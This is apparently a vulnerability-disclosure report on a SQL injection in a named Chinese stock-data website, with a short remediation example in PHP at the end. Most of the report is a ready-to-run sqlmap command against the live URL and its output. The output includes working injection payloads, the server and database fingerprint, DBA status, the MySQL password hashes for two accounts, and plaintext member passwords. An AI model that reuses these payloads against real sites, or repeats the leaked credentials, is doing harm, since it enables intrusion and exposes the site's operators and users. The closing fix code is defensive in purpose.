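2015-11-19: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2016-01-11: The vendor has actively ignored the vulnerability; details are disclosed to the public.
SQL injection vulnerability on the Dingniugu (顶牛股网) website (DBA privileges + root password disclosure + 2 million stock records exposed)
URL: http://www.dingniugu.com/ddeLine.php?stockcode=601111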
python sqlmap.py -u "http://www.dingniugu.com/ddeLine.php?stockcode=601111" -p stockcode --technique=BTU --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass
Database: scms
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ddedata                               | 2068057 |
+---------------------------------------+---------+

Database: scms
Table: ddedata
[30 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| time     | varchar(20) |
| bb       | varchar(20) |
| cjgs     | varchar(20) |
| cjl      | varchar(20) |
| code     | varchar(20) |
| dat      | varchar(20) |
| ddmc     | varchar(20) |
| ddmr     | varchar(20) |
| ddx      | varchar(20) |
| ddy      | varchar(20) |
| ddz      | varchar(20) |
| dsmc     | varchar(20) |
| dsmr     | varchar(20) |
| ff       | varchar(20) |
| hh       | varchar(20) |
| Increase | varchar(20) |
| junjia   | varchar(20) |
| kaipan   | varchar(20) |
| ltgs     | varchar(20) |
| price    | varchar(20) |
| shoupan  | varchar(20) |
| tdmc     | varchar(20) |
| tdmr     | varchar(20) |
| xdmc     | varchar(20) |
| xdmr     | varchar(20) |
| zml      | varchar(20) |
| zmml     | varchar(20) |
| zs       | varchar(20) |
| zuidi    | varchar(20) |
| zuigao   | varchar(20) |
+----------+-------------+
---
Parameter: stockcode (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: stockcode=601111' AND 8684=8684 AND 'Pobi'='Pobi

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: stockcode=601111' AND (SELECT * FROM (SELECT(SLEEP(5)))FOJq) AND 'OAgX'='OAgX

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: stockcode=-7552' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7a624d646e6e545057744578744c456e42555a7a764f7667466f76434f77736556525050526e4354,0x71787a6b71)-- -
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.2.5
back-end DBMS: MySQL 5.0.12
current user: 'root@localhost'
current user is DBA: True
database management system users [2]:
[*] 'dingniugubbs'@'58.64.150.175'
[*] 'root'@'localhost'

database management system users password hashes:
[*] dingniugubbs [1]:
    password hash: *371C0BA5302BB7C0CA17B74D106DB595839497F3
[*] root [1]:
    password hash: *EE4A8CAEFA3CF6FD89EA134107E2D6A2755AAAB2

available databases [3]:
[*] information_schema
[*] mysql
[*] scms

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 461     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| STATISTICS                            | 73      |
| KEY_COLUMN_USAGE                      | 54      |
| TABLES                                | 48      |
| CHARACTER_SETS                        | 36      |
| TABLE_CONSTRAINTS                     | 34      |
| USER_PRIVILEGES                       | 26      |
| SCHEMA_PRIVILEGES                     | 16      |
| SCHEMATA                              | 3       |
+---------------------------------------+---------+

Database: scms
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ddedata                               | 2068057 |
| golddata                              | 81162   |
| art                                   | 27753   |
| bestgourl                             | 3026    |
| ziliao                                | 2810    |
| yjyg                                  | 2627    |
| nbyj                                  | 2482    |
| bk                                    | 2458    |
| bankcon                               | 781     |
| rmb                                   | 183     |
| bank                                  | 152     |
| bankll                                | 7       |
| userzxg                               | 3       |
| member                                | 2       |
+---------------------------------------+---------+

Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 825     |
| help_topic                            | 475     |
| help_keyword                          | 401     |
| help_category                         | 36      |
| `user`                                | 2       |
| db                                    | 1       |
| func                                  | 1       |
+---------------------------------------+---------+

columns LIKE 'pass' were found in the following databases:
Database: scms
Table: member
[1 column]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| member_password | varchar(32) |
+-----------------+-------------+

Database: mysql
Table: user
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(41) |
+----------+----------+

Database: scms
Table: member
[2 entries]
+-----------------+
| member_password |
+-----------------+
| 666666          |
| 837400          |
+-----------------+

Database: mysql
Table: user
[2 entries]
+-------------------------------------------+
| Password                                  |
+-------------------------------------------+
| *371C0BA5302BB7C0CA17B74D106DB595839497F3 |
| *EE4A8CAEFA3CF6FD89EA134107E2D6A2755AAAB2 |
+-------------------------------------------+
Add filtering.
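One way to apply that fix to the `stockcode` parameter, as an added example that is not code from the original report or from the site: an allow-list check followed by a bound query parameter. The function name `find_dde_rows`, the selected columns, the six-digit rule and the sample rows are assumptions; the demo runs on in-memory SQLite so it works offline.

```php
<?php
// Added example, not the site's code. Assumptions: ddeLine.php reads the
// ddedata table by its `code` column, and valid stock codes are six digits.

function find_dde_rows(PDO $db, $stockcode)
{
    // Allow-list check. \A and \z anchor the whole string, so a trailing
    // newline or an appended quote fails the match.
    if (!is_string($stockcode) || !preg_match('/\A[0-9]{6}\z/', $stockcode)) {
        return null; // caller should answer with HTTP 400
    }
    // Bound parameter: the value is sent as data, never spliced into SQL.
    $stmt = $db->prepare('SELECT code, dat, price FROM ddedata WHERE code = ?');
    $stmt->execute(array($stockcode));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demo on in-memory SQLite with constructed rows so it runs offline.
// Against MySQL, open the PDO handle with a dedicated account that holds
// only SELECT on scms (the report shows the site connecting as
// root@localhost, which is what exposed mysql.user), and set
// PDO::ATTR_EMULATE_PREPARES to false.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ddedata (code VARCHAR(20), dat VARCHAR(20), price VARCHAR(20))');
$db->exec("INSERT INTO ddedata VALUES ('601111', '2015-11-19', '8.50')");
$db->exec("INSERT INTO ddedata VALUES ('600000', '2015-11-19', '12.30')");

$inputs = array(
    '601111', // legitimate request
    // The two blind payloads quoted in the report's sqlmap output:
    "601111' AND 8684=8684 AND 'Pobi'='Pobi",
    "601111' AND (SELECT * FROM (SELECT(SLEEP(5)))FOJq) AND 'OAgX'='OAgX",
);
foreach ($inputs as $input) {
    $rows = find_dde_rows($db, $input);
    echo ($rows === null ? 'rejected' : count($rows) . ' row(s)') . ": $input\n";
}
```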
Unable to contact the vendor, or the vendor actively declined.